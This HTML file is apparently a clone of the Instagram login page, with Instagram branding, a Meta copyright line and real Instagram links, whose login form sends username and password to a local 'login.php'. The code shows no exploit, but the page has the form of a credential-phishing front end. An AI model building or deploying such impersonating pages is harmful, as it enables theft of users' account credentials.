<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <link rel="stylesheet" href="style.css">
  <!--let's add the favicon-->
  <link rel="shortcut icon" href="./photos/icon.png" type="image/x-icon">
  <meta http-equiv="X-UA-Compatible" content="IE-edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram</title>
</head>

<body>

  <div class="login-p">
    <div class="slider">
      <div class="phone">
        <img src="./photos/phone.png" alt="">

        <div class="ss">
          <img class="1-img" src="./photos/screenshot1.png" alt="">
          <img class="1-img" src="./photos/screenshot2.png" alt="">
          <img class="1-img" src="./photos/screenshot3.png" alt="">
          <img class="1-img" src="./photos/screenshot4.png" alt="">
        </div>
      </div>
    </div>

    <div class="login">
      <div class="box">
        <div class="logo">
          <img src="./photos/logo.png" alt="">
        </div>

        <form action="login.php" method="post">
          <div class="email">
            <input type="text" name="username" required>
            <span>Phone number, username, or email</span>
          </div>

          <div class="password">
            <input type="password" name="password" id="password" required>
            <span>Password</span>
            <span class="show-pass">Show</span>
          </div>

          <button id="login">Log in</button>
        </form>

        <div class="line">
          <span>OR</span>
        </div>

        <div class="fb">
          <img src="./photos/fb.png" alt="">
          <a class="fb-login" href="https://www.facebook.com/login/">
            <span>Log in with Facebook</span>
          </a>
        </div>

        <div class="forgot">
          <a class="fgt" href="https://www.instagram.com/accounts/password/reset/?hl=en">
            <span>Forgot password?</span>
          </a>
        </div>
      </div>

      <div class="box">
        <div class="signup">
          <p>Don't have an account? <a class="sgp"
              href="https://www.instagram.com/accounts/signup/phone/?hl=en"><span>Sign
                up</span></a></p>
        </div>
      </div>

      <div class="download">
        <div class="signup">
          <p>Get the app.</p>
        </div>

        <div>
          <img src="./photos/playstore.png" alt="">
          <img src="./photos/microsoft.png" alt="">
        </div>
      </div>
    </div>
  </div>

  <footer>
    <div class="links">
      <ul>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
        <a href="#">
          <li>Meta</li>
        </a>
      </ul>
    </div>

    <div class="footer">
      <span>English &#x25BC;</span> <span> &copy; 2025 Instagram from Meta</span>
    </div>
  </footer>

  <script src="app.js"></script>

</body>

</html>